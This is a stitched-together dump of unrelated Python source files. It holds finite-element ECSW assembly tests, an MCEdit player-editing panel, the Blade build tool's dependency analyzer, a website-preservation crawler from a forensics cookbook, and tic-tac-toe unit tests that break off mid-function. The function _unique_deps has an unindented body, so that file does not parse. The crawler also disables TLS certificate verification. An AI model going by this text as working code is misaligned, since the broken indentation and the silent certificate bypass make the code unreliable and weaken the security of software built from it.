        # BUG FIX: np.float and np.int were removed from NumPy (deprecated in
        # 1.20, removed in 1.24); use the builtin types instead.
        self.nodes = np.array([[0.0, 0.0], [1.0, 0.0], [1.0, 1.0], [0.0, 1.0]], dtype=float)
        self.iconnectivity = [np.array([0, 1, 2], dtype=int), np.array([0, 2, 3], dtype=int),
                              np.array([1, 2], dtype=int), np.array([2, 3], dtype=int)]
        self.asm = StructuralAssembly()

        class DummyTri3Element:
            """Stand-in element returning constant M, K, f, S, E matrices."""

            def __init__(self):
                pass

            def m_int(self, X, u, t=0.):
                M = np.array([[2, 0, -0.5, 0, -0.5, 0],
                              [0, 2, 0, -0.5, 0, -0.5],
                              [-0.5, 0, 2, 0, -0.5, 0],
                              [0, -0.5, 0, 2, 0, -0.5],
                              [-0.5, 0, -0.5, 0, 2, 0],
                              [0, -0.5, 0, -0.5, 0, 2]], dtype=float)
                return M

            def k_and_f_int(self, X, u, t=0.):
                K = np.array([[4, -0.5, -0.5, -0.2, -0.5, -0.2],
                              [-0.2, 4, -0.2, -0.5, -0.2, -0.5],
                              [-0.5, -0.2, 4, -0.2, -0.5, -0.2],
                              [-0.2, -0.5, -0.2, 4, -0.2, -0.5],
                              [-0.5, -0.2, -0.5, -0.2, 4, -0.2],
                              [-0.2, -0.5, -0.2, -0.5, -0.2, 4]], dtype=float)
                f = np.array([3, 1, 3, 1, 3, 1], dtype=float)
                return K, f

            def k_f_S_E_int(self, X, u, t=0):
                K, f = self.k_and_f_int(X, u, t)
                S = np.ones((3, 6), dtype=float)
                E = 2*np.ones((3, 6), dtype=float)
                return K, f, S, E

        self.ele = DummyTri3Element()

    def tearDown(self):
        self.asm = None

    def test_assemble_k_and_f_ecsw_test1(self):
        """Assemble one weighted element into preallocated K and f."""
        weights = [5]
        indices = np.array([1], dtype=int)
        asm = EcswAssembly(weights, indices)
        ele_obj = np.array([self.ele, self.ele], dtype=object)
        element2dofs = np.array([np.array([0, 1, 2, 3, 4, 5], dtype=int), np.array([0, 1, 4, 5, 6, 7], dtype=int)])
        K_global = asm.preallocate(8, element2dofs[indices])
        f_global = np.zeros(K_global.shape[0])
        # record object identities to verify in-place preallocated assembly
        memory_K_global_before = id(K_global)
        memory_K_global_data_before = id(K_global.data)
        memory_f_global_before = id(f_global)
        dofvalues = np.array([0.0, 0.1, 0.2, 0.05, 0.0, 0.05, 0.02, 0.04])
        asm.assemble_k_and_f(self.nodes, ele_obj, self.iconnectivity[0:2], element2dofs, dofvalues, K_csr=K_global, f_glob=f_global)
        K_global_desired = np.zeros((8, 8), dtype=float)
        f_global_desired = np.zeros(8, dtype=float)
        # element 1
        # Not assembled (not in `indices`):
        # K_global_desired[0:6, 0:6], f_global_desired[0:6] = self.ele.k_and_f_int(None, None)
        # element 2
        K_local, f_local = self.ele.k_and_f_int(None, None)
        # diagonals
        K_global_desired[0:2, 0:2] += weights[0]*K_local[0:2, 0:2]
        K_global_desired[4:, 4:] += weights[0]*K_local[2:, 2:]
        # off-diagonals
        K_global_desired[0:2, 4:] += weights[0]*K_local[0:2, 2:]
        K_global_desired[4:, 0:2] += weights[0]*K_local[2:, 0:2]
        # f_int:
        f_global_desired[0:2] += weights[0]*f_local[0:2]
        f_global_desired[4:] += weights[0]*f_local[2:]
        assert_array_equal(K_global.todense(), K_global_desired)
        assert_array_equal(f_global, f_global_desired)
        # Test if preallocation is working (no reallocation happened)
        memory_K_global_after = id(K_global)
        memory_K_global_data_after = id(K_global.data)
        memory_f_global_after = id(f_global)
        self.assertTrue(memory_K_global_after == memory_K_global_before)
        self.assertTrue(memory_K_global_data_after == memory_K_global_data_before)
        self.assertTrue(memory_f_global_after == memory_f_global_before)

    def test_assemble_k_and_f_ecsw_test2(self):
        """Assemble two weighted elements without preallocation."""
        weights = np.array([5.0, 4.0])
        indices = np.array([1, 0], dtype=int)
        asm = EcswAssembly(weights, indices)
        ele_obj = np.array([self.ele, self.ele], dtype=object)
        element2dofs = np.array([np.array([0, 1, 2, 3, 4, 5], dtype=int), np.array([0, 1, 4, 5, 6, 7], dtype=int)])
        K_global, f_global = asm.assemble_k_and_f(self.nodes, ele_obj, self.iconnectivity[0:2], element2dofs, K_csr=None,
                                                  f_glob=None)
        K_global_desired = np.zeros((8, 8), dtype=float)
        f_global_desired = np.zeros(8, dtype=float)
        # element 0 (weight index 1, per `indices` ordering)
        K_global_desired[0:6, 0:6], f_global_desired[0:6] = self.ele.k_and_f_int(None, None)
        K_global_desired[0:6, 0:6] = weights[1]*K_global_desired[0:6, 0:6]
        f_global_desired[0:6] = weights[1]*f_global_desired[0:6]
        # element 1 (weight index 0)
        K_local, f_local = self.ele.k_and_f_int(None, None)
        # diagonals
        K_global_desired[0:2, 0:2] += weights[0]*K_local[0:2, 0:2]
        K_global_desired[4:, 4:] += weights[0]*K_local[2:, 2:]
        # off-diagonals
        K_global_desired[0:2, 4:] += weights[0]*K_local[0:2, 2:]
        K_global_desired[4:, 0:2] += weights[0]*K_local[2:, 0:2]
        # f_int:
        f_global_desired[0:2] += weights[0]*f_local[0:2]
        f_global_desired[4:] += weights[0]*f_local[2:]
        assert_array_equal(K_global.todense(), K_global_desired)
        assert_array_equal(f_global, f_global_desired)

    def test_assemble_k_f_S_E_ecsw(self):
        """Assemble K, f plus stress/strain fields for the weighted subset."""
        weights = [5]
        indices = np.array([1], dtype=int)
        asm = EcswAssembly(weights, indices)
        ele_obj = np.array([self.ele, self.ele], dtype=object)
        element2dofs = [np.array([0, 1, 2, 3, 4, 5], dtype=int), np.array([0, 1, 4, 5, 6, 7], dtype=int)]
        # BUG FIX: np.Inf alias was removed in NumPy 2.0; np.inf is canonical.
        elements_on_node = np.array([weights[0], np.inf, weights[0], weights[0]])
        K_global = asm.preallocate(8, element2dofs)
        f_global = np.zeros(K_global.shape[0])
        memory_K_global_before = id(K_global)
        memory_K_global_data_before = id(K_global.data)
        memory_f_global_before = id(f_global)
        K_global, f_global, S_global, E_global = asm.assemble_k_f_S_E(self.nodes, ele_obj, self.iconnectivity[0:2],
                                                                      element2dofs, elements_on_node, K_csr=K_global, f_glob=f_global)
        memory_K_global_after = id(K_global)
        memory_K_global_data_after = id(K_global.data)
        memory_f_global_after = id(f_global)
        # test fully preallocated version (objects reused in place)
        self.assertTrue(memory_K_global_after == memory_K_global_before)
        self.assertTrue(memory_K_global_data_after == memory_K_global_data_before)
        self.assertTrue(memory_f_global_after == memory_f_global_before)
        K_global_desired = np.zeros((8, 8), dtype=float)
        f_global_desired = np.zeros(8, dtype=float)
        # element 1
        # Not assembled (not in `indices`):
        # K_global_desired[0:6, 0:6], f_global_desired[0:6] = self.ele.k_and_f_int(None, None)
        # element 2
        K_local, f_local = self.ele.k_and_f_int(None, None)
        # diagonals
        K_global_desired[0:2, 0:2] += weights[0] * K_local[0:2, 0:2]
        K_global_desired[4:, 4:] += weights[0] * K_local[2:, 2:]
        # off-diagonals
        K_global_desired[0:2, 4:] += weights[0] * K_local[0:2, 2:]
        K_global_desired[4:, 0:2] += weights[0] * K_local[2:, 0:2]
        # f_int:
        f_global_desired[0:2] += weights[0] * f_local[0:2]
        f_global_desired[4:] += weights[0] * f_local[2:]
        assert_array_equal(K_global.todense(), K_global_desired)
        assert_array_equal(f_global, f_global_desired)
        S_global_desired = np.ones((4, 6))
        E_global_desired = np.ones((4, 6))*2
        # Set 2nd rows to zero as this node has no element in ecsw assembly:
        S_global_desired[1, :] = 0.0
        E_global_desired[1, :] = 0.0
        assert_array_equal(K_global.todense(), K_global_desired)
        assert_array_equal(f_global, f_global_desired)
        assert_array_equal(S_global, S_global_desired)
        assert_array_equal(E_global, E_global_desired)
|
"""
player
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
import uuid
from PySide import QtGui
from PySide.QtCore import Qt
import itertools
from mcedit2.command import SimpleRevisionCommand
from mcedit2.ui.panels.player import Ui_playerWidget
from mcedit2.util.player_server import PlayerDataCache
from mceditlib.nbt import NBTFormatError
from mceditlib.util.lazyprop import weakrefprop
from mcedit2.util.screen import centerWidgetInScreen
from mcedit2.widgets.inventory import InventoryEditor
from mcedit2.widgets.layout import Row
from mcedit2.util.resources import resourcePath
from mcedit2.widgets.propertylist import PropertyListModel
from mceditlib.exceptions import PlayerNotFound
log = logging.getLogger(__name__)
def playerSlotLayout():
    """Build the (column, row, slotNumber) layout for the player inventory UI.

    Rows: row 0 is the four equipment slots (NBT slots 100-103), rows 1-3 are
    the main 9x3 inventory (slots 9-35), and row 4 is the hotbar (slots 0-8).
    """
    equipment = [(col, 0, 100 + col) for col in range(4)]
    inventory = [(col, row + 1, col + 9 * row + 9)
                 for col, row in itertools.product(range(9), range(3))]
    hotbar = [(col, 4, col) for col in range(9)]
    return equipment + inventory + hotbar

PLAYER_SLOT_LAYOUT = playerSlotLayout()
class PlayerPropertyChangeCommand(SimpleRevisionCommand):
    """Undo-stack command for a player property edit; adds no behavior of its
    own, it only exists as a distinct command type for the revision system."""
    pass
class PlayerPanel(QtGui.QWidget, Ui_playerWidget):
    """Tool window for inspecting and editing player data (NBT properties,
    inventory, position) of the world opened in an editor session."""

    def __init__(self, editorSession):
        """
        :type editorSession: mcedit2.editorsession.EditorSession
        :rtype: PlayerPanel
        """
        super(PlayerPanel, self).__init__(QtGui.qApp.mainWindow, f=Qt.Tool)
        self.setupUi(self)
        self.editorSession = editorSession
        self.selectedUUID = None
        self.nbtEditor.editorSession = self.editorSession
        self.inventoryEditor = InventoryEditor(PLAYER_SLOT_LAYOUT)
        self.inventoryGroupBox.setLayout(Row(self.inventoryEditor))
        self.movePlayerButton.clicked.connect(self.movePlayerToCamera)
        self.viewPlayerButton.clicked.connect(self.showPlayerView)
        # The empty-string UUID conventionally names the single-player entry.
        playerUUIDs = list(editorSession.worldEditor.listPlayers())
        try:
            sp = editorSession.worldEditor.getPlayer("")
            singlePlayerUUID = sp.UUID
        except (PlayerNotFound, NBTFormatError):
            log.info("No single-player.")
            singlePlayerUUID = None
        except KeyError:
            log.info("Failed to get single-player UUID.")
            singlePlayerUUID = None
        if "" in playerUUIDs:
            # Move singleplayer to beginning of list
            playerUUIDs.remove("")
            playerUUIDs.insert(0, "")
        for UUID in playerUUIDs:
            if UUID == "":
                displayName = "[Single-player](%s)" % singlePlayerUUID
            else:
                displayName = UUID
                try:
                    UUID = uuid.UUID(hex=UUID)
                    if UUID == singlePlayerUUID:
                        displayName = "[Multiplayer](%s)" % singlePlayerUUID
                except ValueError:  # badly formed uuid?
                    log.warn("Could not get a UUID from %s", UUID)
                    continue
            idx = self.playerListBox.count()
            self.playerListBox.addItem(displayName, UUID)

            # Factory returning an async callback that rewrites this list
            # entry's label once the player's name has been fetched.
            # (idx is bound as a default so each closure keeps its own index.)
            def _callback(idx, fmt="%s"):
                def callback(result, error):
                    if result:
                        name = result['name']
                        self.playerListBox.setItemText(idx, fmt % name)
                return callback

            if UUID == "":
                if singlePlayerUUID:
                    PlayerDataCache.getPlayerInfo(singlePlayerUUID, _callback(idx, "[Single-player]%s"))
            else:
                if UUID == singlePlayerUUID:
                    PlayerDataCache.getPlayerInfo(UUID, _callback(idx, "[Multiplayer]%s"))
                else:
                    PlayerDataCache.getPlayerInfo(UUID, _callback(idx))
        self.playerListBox.currentIndexChanged[int].connect(self.setSelectedPlayerIndex)
        if len(playerUUIDs):
            self.setSelectedPlayerIndex(0)
        icon = QtGui.QIcon(resourcePath("mcedit2/assets/mcedit2/icons/edit_player.png"))
        action = QtGui.QAction(icon, self.tr("Edit Player"), self)
        action.setCheckable(True)
        action.triggered.connect(self.toggleView)
        self._toggleViewAction = action
        self.editorSession.revisionChanged.connect(self.revisionDidChange)
        self.initPropertiesWidget()
        centerWidgetInScreen(self)

    # Weak reference to avoid a reference cycle keeping the session alive.
    editorSession = weakrefprop()

    def initPropertiesWidget(self):
        """(Re)build the property-list model for the selected player's NBT."""
        if self.selectedPlayer is None:
            self.playerPropertiesWidget.setModel(None)
            return
        model = PropertyListModel(self.selectedPlayer.rootTag)
        addWidget = model.addNBTProperty
        addWidget("AbsorptionAmount")
        addWidget("Air")
        addWidget("DeathTime")
        addWidget("Dimension")
        addWidget("FallDistance", valueType=float)
        addWidget("Fire")
        addWidget("foodExhaustionLevel", valueType=float)
        addWidget("foodLevel")
        addWidget("foodSaturationLevel", valueType=float)
        addWidget("foodTickTimer")
        addWidget("HealF", valueType=float)
        addWidget("Health")
        addWidget("HurtByTimestamp")
        addWidget("HurtTime")
        addWidget("Invulnerable", bool)
        addWidget("OnGround", bool)
        addWidget("playerGameType", [(0, "Survival"), (1, "Creative"), (2, "Adventure")])
        addWidget("PortalCooldown")
        addWidget("Score")
        addWidget("SelectedItemSlot")  # xxx inventory
        addWidget("Sleeping", bool)
        addWidget("SleepTimer")
        addWidget("XpLevel")
        addWidget("XpP", float)
        addWidget("XpSeed")
        addWidget("XpTotal")
        self.playerPropertiesWidget.setModel(model)
        model.propertyChanged.connect(self.propertyDidChange)

    def updateNBTTree(self):
        """Point the raw NBT editor at the currently selected player."""
        self.nbtEditor.undoCommandPrefixText = ("Player %s: " % self.selectedUUID) if self.selectedUUID else "Single-player: "
        self.nbtEditor.setRootTagRef(self.selectedPlayer)

    def updateInventory(self):
        """Point the inventory editor at the selected player's inventory."""
        self.inventoryEditor.editorSession = self.editorSession
        self.inventoryEditor.inventoryRef = self.selectedPlayer.Inventory

    def revisionDidChange(self):
        # Refresh both views after an undo/redo changed the world revision.
        self.initPropertiesWidget()
        self.updateNBTTree()

    def propertyDidChange(self, name, value):
        """Record a player property edit as an undoable command and sync it."""
        if self.selectedUUID != "":
            text = "Change player %s property %s" % (self.selectedUUID, name)
        else:
            text = "Change single-player property %s" % name
        command = PlayerPropertyChangeCommand(self.editorSession, text)
        with command.begin():
            self.selectedPlayer.dirty = True
            self.editorSession.worldEditor.syncToDisk()
        self.editorSession.pushCommand(command)

    def toggleView(self):
        """Show/hide this panel and keep the toolbar action in sync."""
        if self.isHidden():
            self.show()
            self._toggleViewAction.setChecked(True)
        else:
            self.hide()
            self._toggleViewAction.setChecked(False)

    def closeEvent(self, event):
        # Closing the tool window behaves like toggling it off.
        self.toggleView()

    def toggleViewAction(self):
        return self._toggleViewAction

    def setSelectedPlayerIndex(self, index):
        UUID = self.playerListBox.itemData(index)
        self.setSelectedPlayerUUID(UUID)

    def setSelectedPlayerUUID(self, UUID):
        self.selectedUUID = UUID
        self.updateNBTTree()
        self.updateInventory()

    @property
    def selectedPlayer(self):
        """The player ref for the selected UUID, or None if not found."""
        try:
            return self.editorSession.worldEditor.getPlayer(self.selectedUUID)
        except PlayerNotFound:
            log.info("PlayerPanel: player %s not found!", self.selectedUUID)

    def movePlayerToCamera(self):
        """Teleport the selected player to the current camera position."""
        view = self.editorSession.editorTab.currentView()
        if view.viewID == "Cam":
            command = SimpleRevisionCommand(self.editorSession, "Move Player")
            with command.begin():
                self.selectedPlayer.Position = view.centerPoint
                try:
                    self.selectedPlayer.Rotation = view.yawPitch
                except AttributeError:
                    pass
                self.selectedPlayer.dirty = True  # xxx do in AnvilPlayerRef
            self.editorSession.pushCommand(command)
        else:
            raise ValueError("Current view is not camera view.")

    def showPlayerView(self):
        """Move the camera view to the selected player's position/rotation."""
        self.editorSession.editorTab.showCameraView()
        view = self.editorSession.editorTab.cameraView
        view.setPerspective(True)
        view.centerPoint = self.selectedPlayer.Position
        view.yawPitch = self.selectedPlayer.Rotation
|
<filename>src/blade/dependency_analyzer.py<gh_stars>0
# Copyright (c) 2011 Tencent Inc.
# All rights reserved.
#
# Author: <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
# Date: October 20, 2011
"""
This is the dependencies expander module which accepts the targets loaded
from BUILD files and will find all of the targets needed by the target and
add extra options according to different target types.
"""
from __future__ import absolute_import
from __future__ import print_function
from blade import console
from blade.util import iteritems, itervalues
def analyze_deps(related_targets):
    """Expand every target's dependencies and return a topological key order.

    Given the map of related targets — the subset of the target database that
    the command-line targets transitively depend on — this expands each
    target's 'deps' into the full set of direct and indirect dependencies,
    builds the reverse (dependents) relation, checks visibility, and finally
    sorts the keys topologically.

    Input: {target_key: target_data, ...} loaded from BUILD files.
    Output: a topologically sorted list of target keys; each target's deps
    have been expanded in place.
    """
    _expand_deps(related_targets)
    _expand_dependents(related_targets)
    for tgt in itervalues(related_targets):
        tgt.check_visibility()
    # The topological order matters even though ninja doesn't need ordered
    # build statements: code generation for a dependent may read information
    # produced by its dependency's generation step, so dependencies must be
    # generated first.
    return _topological_sort(related_targets)
def _expand_deps(targets):
    """Expand the transitive dependency list of every target in *targets*,
    then let each target adjust its options for its expanded deps."""
    for target_key in targets:
        _expand_target_deps(target_key, targets)
        targets[target_key]._expand_deps_generation()
def _unique_deps(new_deps_list):
"""Unique dependency list, for duplicate items only keep the later ones."""
result = []
deps = set()
for dep in reversed(new_deps_list):
if dep not in deps:
result.append(dep)
deps.add(dep)
return list(reversed(result))
def _expand_target_deps(target_id, targets, root_targets=None):
    """_expand_target_deps.

    Return all targets depended on by target_id directly and/or indirectly,
    memoizing the result on target.expanded_deps.
    root_targets tracks the current recursion path to detect dependency cycles.
    """
    target = targets[target_id]
    # Memoized: a previous call already expanded this target.
    if target.expanded_deps is not None:
        return target.expanded_deps
    if root_targets is None:
        root_targets = set()
    root_targets.add(target_id)
    new_deps_list = []
    for d in target.deps:
        # loop dependency: d is already on the current recursion path
        if d in root_targets:
            err_msg = ''
            # NOTE(review): root_targets is a set, so the path printed here is
            # in arbitrary order, not the actual cycle order.
            for t in root_targets:
                err_msg += '//%s --> ' % t
            # console.fatal presumably aborts the build here — confirm.
            console.fatal('Loop dependency found: //%s --> [%s]' % (d, err_msg))
        new_deps_list.append(d)
        new_deps_list += _expand_target_deps(d, targets, root_targets)
        target.merge_substitute_deps(targets[d].substitute_deps)
    # Keep only the last occurrence of each duplicate dependency.
    new_deps_list = _unique_deps(new_deps_list)
    target.expanded_deps = new_deps_list
    # Pop this target off the recursion path before returning.
    root_targets.remove(target_id)
    return new_deps_list
def _expand_dependents(related_targets):
    """Populate the reverse-dependency sets on every target.

    For each target, record its key into the 'dependents' set of each direct
    dependency and into the 'expanded_dependents' set of each transitive
    dependency.

    Args:
        related_targets: dict{target_key, target} to be built
    """
    for key, tgt in iteritems(related_targets):
        for direct_dep in tgt.deps:
            related_targets[direct_dep].dependents.add(key)
        for transitive_dep in tgt.expanded_deps:
            related_targets[transitive_dep].expanded_dependents.add(key)
def _topological_sort(related_targets):
    """Sort target keys by dependency relationship (Kahn's algorithm).

    Targets with no dependencies are emitted first, so each target appears
    after everything it depends on has already been listed.

    Args:
        related_targets: dict{target_key, target} to be built
    Returns:
        list of target keys in topological order.
    """
    indegree = {}  # target_key -> number of not-yet-emitted dependencies
    ready = []     # targets whose dependencies have all been emitted
    for key, tgt in iteritems(related_targets):
        count = len(tgt.deps)
        indegree[key] = count
        if count == 0:
            ready.append(key)
    ordered = []
    # Emit ready targets; each emission may release its dependents.
    while ready:
        current = ready.pop()
        ordered.append(current)
        for dependent_key in related_targets[current].dependents:
            indegree[dependent_key] -= 1
            if indegree[dependent_key] == 0:
                ready.append(dependent_key)
    assert len(ordered) == len(related_targets)
    return ordered
|
from __future__ import print_function
import argparse
from bs4 import BeautifulSoup, SoupStrainer
from datetime import datetime
import hashlib
import logging
import os
import ssl
import sys
from urllib.request import urlopen
import urllib.error
"""
MIT License
Copyright (c) 2017 <NAME>, <NAME>
Please share comments and questions at:
https://github.com/PythonForensics/PythonForensicsCookbook
or email <EMAIL>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
__authors__ = ["<NAME>", "<NAME>"]
__date__ = 20170815
__description__ = "BeautifulSoup Website Preservation Tool"
logger = logging.getLogger(__name__)
def main(website, output_dir):
    """Preserve *website* and every same-site page it links to under
    *output_dir*, logging progress along the way.

    Exits with status 1 on invalid input and 2 when the start page is
    unreachable.
    """
    # Site name without scheme/www, used to decide which links are on-site.
    base_name = website.replace(
        "https://", "").replace("http://", "").replace("www.", "")
    link_queue = set()
    # Require an explicit scheme so urlopen doesn't have to guess.
    if "http://" not in website and "https://" not in website:
        logger.error(
            "Exiting preservation - invalid user input: {}".format(
                website))
        sys.exit(1)
    logger.info("Accessing {} webpage".format(website))
    # NOTE(review): TLS certificate verification is disabled here; presumably
    # intentional for forensic capture of misconfigured sites — confirm.
    context = ssl._create_unverified_context()
    try:
        index = urlopen(website, context=context).read().decode("utf-8")
    except urllib.error.HTTPError as e:
        logger.error(
            "Exiting preservation - unable to access page: {}".format(
                website))
        sys.exit(2)
    logger.debug("Successfully accessed {}".format(website))
    # Save the landing page, then crawl every on-site link found on it.
    write_output(website, index, output_dir)
    link_queue = find_links(base_name, index, link_queue)
    logger.info("Found {} initial links on webpage".format(
        len(link_queue)))
    recurse_pages(website, link_queue, context, output_dir)
    logger.info("Completed preservation of {}".format(website))
def find_links(website, page, queue):
    """Add every on-site, non-fragment href found in *page* to *queue*.

    :param website: substring a href must contain to count as on-site
    :param page: HTML text to scan
    :param queue: set of links, mutated in place
    :return: the same *queue* set
    """
    anchors = BeautifulSoup(page, "html.parser",
                            parse_only=SoupStrainer("a", href=True))
    for anchor in anchors:
        href = anchor.get("href")
        # Skip off-site links and pure fragment anchors ("#section").
        if website in href and not os.path.basename(href).startswith("#"):
            queue.add(href)
    return queue
def recurse_pages(website, queue, context, output_dir):
    """Crawl every queued link, preserving each page and enqueueing new links.

    Iterates until no unprocessed links remain. Pages that fail with an HTTP
    error are logged and skipped.

    :param website: substring used by find_links() to keep links on-site
    :param queue: set of links to crawl, grown as new links are discovered
    :param context: ssl context for urlopen
    :param output_dir: directory where preserved pages are written
    """
    processed = set()  # set (was a list): O(1) membership checks while crawling
    counter = 0
    while len(processed) != len(queue):
        counter += 1
        # Iterate a copy: find_links() mutates the queue while we loop.
        for link in queue.copy():
            if link in processed:
                continue
            processed.add(link)
            try:
                page = urlopen(link, context=context).read().decode(
                    "utf-8")
            except urllib.error.HTTPError as e:
                # Include the HTTP status so failures are diagnosable.
                logger.error("Error accessing webpage: {} ({})".format(link, e))
                continue
            write_output(link, page, output_dir, counter)
            queue = find_links(website, page, queue)
    logger.info("Identified {} links throughout website".format(
        len(queue)))
def hash_data(data):
    """Return the SHA-256 hex digest of *data* encoded as UTF-8."""
    return hashlib.sha256(data.encode("utf-8")).hexdigest()
def hash_file(file):
    """Return the SHA-256 hex digest of the contents of *file*."""
    with open(file, "rb") as in_file:
        return hashlib.sha256(in_file.read()).hexdigest()
def write_output(name, data, output_dir, counter=0):
    """Write a preserved page to disk, mirroring its URL path under *output_dir*.

    The scheme is stripped from *name* and the crawl-pass *counter* is appended
    to the filename so successive passes do not overwrite each other. Input and
    output hashes are logged at debug level for integrity auditing.

    :param name: URL of the page being written
    :param data: page text (already decoded as UTF-8 by the caller)
    :param output_dir: root directory for preserved output
    :param counter: crawl-pass number appended to the filename
    """
    name = name.replace("http://", "").replace("https://", "").rstrip("//")
    directory = os.path.join(output_dir, os.path.dirname(name))
    if not os.path.exists(directory) and os.path.dirname(name) != "":
        os.makedirs(directory)
    logger.debug("Writing {} to {}".format(name, output_dir))
    logger.debug("Data Hash: {}".format(hash_data(data)))
    path = os.path.join(output_dir, name)
    path = path + "_" + str(counter)
    # Fix: force UTF-8 on write. The page was decoded as UTF-8, and the
    # platform default encoding (e.g. cp1252 on Windows) can raise
    # UnicodeEncodeError on non-ASCII content.
    with open(path, "w", encoding="utf-8") as outfile:
        outfile.write(data)
    logger.debug("Output File Hash: {}".format(hash_file(path)))
if __name__ == "__main__":
    # Command-line entry point: parse arguments, wire up logging to both
    # stderr and a log file, then run the preservation crawl.
    parser = argparse.ArgumentParser(
        description=__description__,
        epilog="Developed by {} on {}".format(
            ", ".join(__authors__), __date__)
    )
    parser.add_argument("DOMAIN", help="Website Domain")
    parser.add_argument("OUTPUT_DIR", help="Preservation Output Directory")
    # Default log file: this script's filename with ".py" swapped for ".log".
    parser.add_argument("-l", help="Log file path",
                        default=__file__[:-3] + ".log")
    args = parser.parse_args()
    logger.setLevel(logging.DEBUG)
    msg_fmt = logging.Formatter("%(asctime)-15s %(funcName)-10s"
                                "%(levelname)-8s %(message)s")
    # Stream handler -> stderr; file handler appends to the chosen log file.
    strhndl = logging.StreamHandler(sys.stderr)
    strhndl.setFormatter(fmt=msg_fmt)
    fhndl = logging.FileHandler(args.l, mode='a')
    fhndl.setFormatter(fmt=msg_fmt)
    logger.addHandler(strhndl)
    logger.addHandler(fhndl)
    logger.info("Starting BS Preservation")
    logger.debug("Supplied arguments: {}".format(sys.argv[1:]))
    logger.debug("System " + sys.platform)
    logger.debug("Version " + sys.version)
    # Create the output directory up front so write_output() can assume it exists.
    if not os.path.exists(args.OUTPUT_DIR):
        os.makedirs(args.OUTPUT_DIR)
    main(args.DOMAIN, args.OUTPUT_DIR)
|
import numpy as np
import pytest
from utils.helpers import (Game, tuple_to_str, str_to_tuple, array_in_list, moving_average,
state_to_actions, check_states, state_transforms, reverse_transforms, reverse_function,
play_game, value_frequencies, moving_value_frequencies)
@pytest.mark.parametrize(
    "won, expected",
    [
        pytest.param(1, 1, id="won"),
        pytest.param(-1, -1, id="lost"),
        pytest.param(0, 0, id="tie-or-not-done")
    ],
)
def test_Game_determine_reward(won, expected):
    """The reward for marker 1 mirrors the game's win flag."""
    game = Game()
    game.won = won
    assert game.determine_reward(1) == expected
@pytest.mark.parametrize(
    "loc, marker, expected",
    [
        pytest.param((0, 0), 2, False, id="invalid-marker"),
        pytest.param((0, 0), -1, False, id="not-turn"),
        pytest.param((1, 1), 1, False, id="loc-not-empty"),
        pytest.param((0, 0), 1, True, id="valid")
    ],
)
def test_Game_mark(loc, marker, expected):
    """mark() only places a marker on an empty square when it is that marker's turn."""
    game = Game()
    game.turn = 1
    game.state[1, 1] = -1  # occupy the centre square for the "loc-not-empty" case
    row, col = loc
    previous_mark = game.state[row, col]

    valid, _ = game.mark(loc, marker)

    assert valid == expected
    if valid:
        # A valid move flips the turn and records the marker.
        assert game.turn == int(marker * -1)
        assert game.state[row, col] == marker
    else:
        # An invalid move leaves both the turn and the board untouched.
        assert game.turn == 1
        assert game.state[row, col] == previous_mark
@pytest.mark.parametrize(
    "state, expected",
    [
        pytest.param((1, -1, 1, -1, -1, 1, 1, 1, -1), True, id="full-board"),
        pytest.param((1, -1, 1, -1, -1, 1, 1, -1, -1), True, id="won"),
        pytest.param((1, -1, 1, 0, -1, 0, 1, 0, -1), False, id="not-done")
    ],
)
def test_Game_update_done(state, expected):
    """_update_done flags full boards and won boards as finished."""
    game = Game()
    game.state = np.reshape(state, game.board_shape)
    game._update_done()
    assert game.done == expected
@pytest.mark.parametrize(
    "state, expected",
    [
        pytest.param((1, -1, 1, -1, -1, 1, 1, 1, -1), Game.empty_marker, id="none"),
        pytest.param((-1, -1, 1, 1, -1, 1, 1, 1, -1), -1, id="diag"),
        pytest.param((1, -1, 1, -1, -1, 1, 1, -1, -1), -1, id="vert"),
        pytest.param((1, -1, 1, -1, -1, -1, 1, 1, -1), -1, id="horiz")
    ],
)
def test_Game_update_won(state, expected):
    """_update_won detects diagonal, vertical and horizontal three-in-a-rows."""
    game = Game()
    game.state = np.reshape(state, game.board_shape)
    game._update_won()
    assert game.won == expected
@pytest.mark.parametrize(
    "tupe, expected",
    [
        pytest.param(tuple(), '', id="empty"),
        pytest.param((0, -1, 1, 0, -1, 1, 1, 0, -1), '0-110-1110-1', id="full")
    ],
)
def test_tuple_to_str(tupe, expected):
    """tuple_to_str serialises a board tuple into its compact string form."""
    result = tuple_to_str(tupe)
    assert isinstance(result, str)
    assert result == expected
@pytest.mark.parametrize(
    "string, expected",
    [
        pytest.param('', tuple(), id="empty"),
        pytest.param('0-110-1110-1', (0, -1, 1, 0, -1, 1, 1, 0, -1), id="full")
    ],
)
def test_str_to_tuple(string, expected):
    """str_to_tuple is the inverse of tuple_to_str."""
    result = str_to_tuple(string)
    assert isinstance(result, tuple)
    assert result == expected
@pytest.mark.parametrize(
    "arr, arr_list, expected",
    [
        pytest.param([0, 1, 2], [], False, id="empty-list"),
        pytest.param([0, 1, 2], [[2, 1, 0], [], [0, -1, 2]], False, id="not-in"),
        pytest.param([[0, 1], [2, 3]], [[1, 1], [[0, 1], [2, 3]]], True, id="in"),
    ],
)
def test_array_in_list(arr, arr_list, expected):
    """array_in_list reports exact (element-wise) array membership."""
    candidates = [np.array(a) for a in arr_list]
    assert array_in_list(np.array(arr), candidates) == expected
@pytest.mark.parametrize(
    "vals, n, expected",
    [
        pytest.param([0, 1, 2, 3, 4], 10, [], id="n>len(vals)"),
        pytest.param([0, 1, 2, 3, 4], 3, [1, 2, 3], id="normal"),
    ],
)
def test_moving_average(vals, n, expected):
